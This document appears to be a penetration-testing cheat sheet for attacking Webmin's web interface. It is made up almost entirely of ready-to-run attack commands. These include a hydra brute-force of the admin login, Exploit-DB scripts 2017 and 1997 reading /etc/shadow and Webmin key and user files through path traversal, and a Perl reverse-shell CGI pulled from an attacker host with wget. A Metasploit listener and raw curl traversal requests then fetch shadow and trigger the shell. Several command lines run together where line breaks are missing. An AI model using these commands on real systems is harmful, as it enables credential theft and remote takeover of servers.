Webmin is one of the world’s most popular open-source web-based applications for managing Unix-based systems. It allows management of a system remotely through a Web-GUI.
URL like http://x.x.x.x:10000/
Bruteforce Login Page
IP=x.x.x.x
WL=/usr/share/wordlists/rockyou.txt
FAILED_MSG="Login failed. Please try again."
COOKIES="testing=1"
hydra $IP -s 10000 -t 4 http-form-post "/session_login.cgi:page=%2F&user=admin&pass=^PASS^&submit=Login:${FAILED_MSG}:H=Cookie: ${COOKIES}" -l admin -P $WL -vV -fUseful exploits
Webmin < 1.290 / Usermin < 1.220 – Arbitrary File Disclosure
https://www.exploit-db.com/exploits/2017
searchsploit -m 2017
chmod u+x 2017.plIP=x.x.x.x
PORT=10000
./2017.pl $IP $PORT /etc/passwd http
./2017.pl $IP $PORT /etc/shadow http
./2017.pl $IP $PORT /etc/webmin/miniserv.conf http
./2017.pl $IP $PORT /etc/webmin/miniserv.users http
./2017.pl $IP $PORT /etc/webmin/miniserv.pem httpLocal File Inclusion (LFI)
USE IT AS A LOCAL FILE INCLUSION!!
Distribute a reverse shell payload (perl)
cp /usr/share/webshells/perl/perl-reverse-shell.pl rshell.cgi
nano rshell.cgi
# Edit IP and port for reverse shellpython3 -m http.server 80On victim
cd /tmp
wget -O rshell.cgi http://KALI_IP/rshell.cgi
chmod 755 rshell.cgiOn Kali
msf-multi.rc:
use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST tun0
set LPORT 443
set ExitOnSession false
exploit -jsudo msfconsole -q -r msf-multi.rcIP=x.x.x.x
PORT=10000
./2017.pl $IP $PORT /tmp/rshell.cgi httpSame can be done with exploit 1997
https://www.exploit-db.com/exploits/1997
sudo apt install php-curlIP=x.x.x.x
PORT=10000
php 1997.php $IP $PORT http /tmp/rshell.cgiExploit 1997 – using curl
curl 'http://x.x.x.x:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow'curl 'http://x.x.x.x:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/rshell.cgi'